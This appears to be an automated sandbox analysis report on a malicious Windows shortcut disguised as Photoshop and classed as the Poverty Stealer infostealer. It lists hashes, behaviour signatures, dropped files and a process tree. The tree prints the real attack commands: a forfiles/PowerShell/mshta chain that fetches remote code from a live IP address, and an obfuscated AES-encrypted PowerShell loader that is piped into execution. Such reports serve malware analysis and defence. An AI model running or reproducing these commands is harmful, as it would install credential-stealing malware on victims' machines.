Overview

overview

10

Static

static

1

photoshop.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    147s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-03-2024 20:17

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    photoshop.lnk

  • Size

    1KB

  • MD5

    e0c8dc3509ab18f1feae1a35ee36a82a

  • SHA1

    46560534976b84abe00123d821fbdfab148403e4

  • SHA256

    704c6726ac624046f3a428f5dd6c1e461d9172cea5cdb313f176d361454a0419

  • SHA512

    171db39c91a149735316379111572e267ab874cbf3925956afcc0fc2a1e0a57825f096aaf6d43fc5de03f6cce2822131ff9bf7c72204a7d8d38bd32a32844392

Score
10/10
povertystealerevasionspywarestealertrojanupx

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://91.92.251.35/Downloads/Lar/photoshop

Signatures

  • Detect Poverty Stealer Payload 1 IoCs
  • Poverty Stealer

    Poverty Stealer is a crypto and infostealer written in C++.

    stealerpovertystealer
  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\photoshop.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1488
    • C:\Windows\System32\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta http://91.92.251.35/Downloads/Lar/photoshop
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3680
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        start mshta http://91.92.251.35/Downloads/Lar/photoshop
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4468
        • C:\Windows\system32\mshta.exe
          "C:\Windows\system32\mshta.exe" http://91.92.251.35/Downloads/Lar/photoshop
          4⤵
          • Blocklisted process makes network request
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:3076
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $Doaj = 'AAAAAAAAAAAAAAAAAAAAADers9PJ6xlLVT2iLiiCmurb7hNHS+bm86DyHQOtaEEHn6mCk19MuBdMWsWswZGThsWoEjZ3M2IsES6Ta+W7eVI9GxPAHKsNBidWfPy5Jjn8oHZyyldy5uSyuJqR6BazsmvPis8BD1Ize4UFUMayR+UuPK97pbXLIpdixkLzDaSaozRI+su8HTxng9oYCUT8SIDGymBlIPPirk5KwcONV5KcvEGukTi48N4QalFRoheMBLnNCEipodaLmqsqTkpccIJ1sPw/8VQXtaDtSA1nx84ZXPaN6n5x5gS8aGXXdNl80Zd3m3n+jitUAQyOjddZVJUDeL36NKWKafxmZm+IS5KvZJjwbefF0rKJWt3mHJkqzqnMZ/GZwZ7Kmo3FVHRTCMjDoGRBAuLu8bsHd/eweJH/4AuQzCNnMTbm48E8eLcZZMB+1whxlz3o1kHeLqzJFC9Ggbl+u/zoIrnRx6X8B7b5A49pT+vCVod664yu7QrgL5nd+wjhPfMFA5fg0OYvKWbOLaR+daXqVMNTy+pzKCw5btYcoWJwuD+Oq681f8H/BfFpvWqeFQTz0CLL5fezXgWH+exivRzoUVCrxT0lPKG2DMrpgYLKCri3FSvKlgJ8U/iFi+viwK6Ra4kWKteYdtMiB7yptDzhdtgfQDbDE4b7gUsRggRBiZ0an2eprwY+97rw+2bHOEnZDvJCtOayoCWdE27HcETLfLml9AlDAyw2UEqWWuFc0zxwh7lJEi/1k8jDiJu2oYs/ciElJIgjxZhz5HCeYAadPreeY32Ws0AX0FZbW2QREFOIuYJbUbsoC4JhyjWohB/lgSGx+UVx7AqKGYq110GBPcq9KM5W+df+J6s4vobxDlocNaSyV5NjiOIEcA+X9IDDoMVWpj7XDs3B6iVI2LkC0eQ9xOl2hPb9+Z7owOQeyyna6kpwr2ZKY/KhOaTUGHhCR7/y403W8Ne3HI6TmQRoFT4KtikNX5hdWYxrAr/bPpQsR4aoPm0Y';$lOdvDYPo = 'amJEcXN5b0lPZmRjc2xxQUhTbGtrdU5YTEtKeGFETHg=';$XTxbjY = New-Object 'System.Security.Cryptography.AesManaged';$XTxbjY.Mode = [System.Security.Cryptography.CipherMode]::ECB;$XTxbjY.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$XTxbjY.BlockSize = 128;$XTxbjY.KeySize = 256;$XTxbjY.Key = [System.Convert]::FromBase64String($lOdvDYPo);$lLqsN = [System.Convert]::FromBase64String($Doaj);$sXEuQEMv = $lLqsN[0..15];$XTxbjY.IV = $sXEuQEMv;$QHNqwuDDj = $XTxbjY.CreateDecryptor();$xXmWRVZMX = $QHNqwuDDj.TransformFinalBlock($lLqsN, 16, $lLqsN.Length - 16);$XTxbjY.Dispose();$VJJYW = New-Object System.IO.MemoryStream( , $xXmWRVZMX );$XqxWhNb = New-Object System.IO.MemoryStream;$LAISYiBmx = New-Object System.IO.Compression.GzipStream $VJJYW, ([IO.Compression.CompressionMode]::Decompress);$LAISYiBmx.CopyTo( $XqxWhNb );$LAISYiBmx.Close();$VJJYW.Close();[byte[]] $VlUkz = $XqxWhNb.ToArray();$DwCaBfh = [System.Text.Encoding]::UTF8.GetString($VlUkz);$DwCaBfh | powershell -
            5⤵
            • Drops file in Windows directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2336
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
              6⤵
              • UAC bypass
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4932
              • C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe
                "C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe"
                7⤵
                • Executes dropped EXE
                • Checks processor information in registry
                • Enumerates system info in registry
                • Modifies Internet Explorer settings
                • Suspicious use of SetWindowsHookEx
                PID:2440
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2440 -s 1860
                  8⤵
                  • Program crash
                  PID:3860
              • C:\Users\Admin\AppData\Roaming\Lyrufos.exe
                "C:\Users\Admin\AppData\Roaming\Lyrufos.exe"
                7⤵
                • Executes dropped EXE
                PID:3168
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2440 -ip 2440
    1⤵
      PID:380

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      d85ba6ff808d9e5444a4b369f5bc2730

      SHA1

      31aa9d96590fff6981b315e0b391b575e4c0804a

      SHA256

      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

      SHA512

      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      64B

      MD5

      3ca1082427d7b2cd417d7c0b7fd95e4e

      SHA1

      b0482ff5b58ffff4f5242d77330b064190f269d3

      SHA256

      31f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f

      SHA512

      bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_itd2eveg.3wy.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\{2273A23D-1AAC-4CE4-B310-958937CCF49A}\CCDInstaller.js
      Filesize

      1.2MB

      MD5

      e96bb3da47f4a3319b80f23051bdeb16

      SHA1

      c9913b052c5c7a59e100fe18357fddc1023161ea

      SHA256

      d69d7e68a706c60146a5b530368d7818599dbd39d071f181963a89945cff3c29

      SHA512

      6ac5bcdcdd2c70cb5094a6c985a81df520a6cf9f622c0697e00c0e3e4081cdb967f3da9df2a04072552dff2f70c43c9e84c2b6f3bf81f3720983859dff46f56e

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\{2273A23D-1AAC-4CE4-B310-958937CCF49A}\index.html
      Filesize

      426B

      MD5

      a28ab17b18ff254173dfeef03245efd0

      SHA1

      c6ce20924565644601d4e0dd0fba9dde8dea5c77

      SHA256

      886c0ab69e6e9d9d5b5909451640ea587accfcdf11b8369cad8542d1626ac375

      SHA512

      9371a699921b028bd93c35f9f2896d9997b906c8aba90dd4279abba0ae1909a8808a43bf829584e552ccfe534b2c991a5a7e3e3de7618343f50b1c47cff269d6

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Lyrufos.exe
      Filesize

      29KB

      MD5

      16db89328ce227006c153728c0ade1ae

      SHA1

      effd7c2992e64fa2d266b92054d3dee5f1e950f5

      SHA256

      69962181ff1d9d8f9dc80b1f91f8963aeb423f4e06f25ce3e81d22e16e1866ab

      SHA512

      6e1f7094d0b7b5788c8f6bf211b452d417b1ad1a0720d0fe59b3ec9d1af978d0108acb0b53a6d002245603b68e607c5297f2c01ec18fcaf6634bae02b7c26fd5

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe
      Filesize

      2.9MB

      MD5

      c56adb18f4440a6c085141c508256cbd

      SHA1

      9ac2fef2d12260c1e717d8de61b8a42840a1cac4

      SHA256

      1cde83baf8606ef1df93264cdfa6af9889fbe4bd03f5584df62119d048f7687a

      SHA512

      4457a323d9d96383e525c796fb9d440ff9ab5827f0616b4a12ccf535e18985aa4972d6d62d29112b5a7e2bc82f567201d15ed9becac84bed5e2ee298c00d7429

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe
      Filesize

      1.8MB

      MD5

      b6f4b0ce8d68fa8a3d2ed69a50f4a8da

      SHA1

      c8037db70d2c53f0efbc746efabf7968d6d09e1a

      SHA256

      796c2a6de48e4206f14a87f6770990fd663423b2b1ce1ddef9a510123f2c5ead

      SHA512

      7d0860bf32135f545352be88d2b942979fc56bc37e6fa58068fc40c205a2ddc9d1255f1785ceb4e361110482b44105c30116d72b7a9d955d68849a2d54093bb2

      Download Submit

    • memory/2336-33-0x000001C28C120000-0x000001C28C130000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2336-32-0x00007FFF163F0000-0x00007FFF16EB1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2336-34-0x000001C28C120000-0x000001C28C130000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2336-36-0x000001C28C120000-0x000001C28C130000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2336-73-0x00007FFF163F0000-0x00007FFF16EB1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2440-101-0x0000000000620000-0x0000000000F72000-memory.dmp

      Filesize

      9.3MB

      Download

    • memory/2440-61-0x0000000000620000-0x0000000000F72000-memory.dmp

      Filesize

      9.3MB

      Download

    • memory/3168-102-0x00000000005F0000-0x00000000005F1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/4468-11-0x00000231472E0000-0x00000231472F0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4468-16-0x00007FFF16170000-0x00007FFF16C31000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4468-10-0x00007FFF16170000-0x00007FFF16C31000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4468-0-0x0000023147190000-0x00000231471B2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4468-12-0x00000231472E0000-0x00000231472F0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4468-13-0x00000231472E0000-0x00000231472F0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4932-50-0x000001833AAF0000-0x000001833AB66000-memory.dmp

      Filesize

      472KB

      Download

    • memory/4932-49-0x000001833A6C0000-0x000001833A704000-memory.dmp

      Filesize

      272KB

      Download

    • memory/4932-47-0x0000018320040000-0x0000018320050000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4932-48-0x0000018320040000-0x0000018320050000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4932-71-0x00007FFF163F0000-0x00007FFF16EB1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4932-46-0x00007FFF163F0000-0x00007FFF16EB1000-memory.dmp

      Filesize

      10.8MB

      Download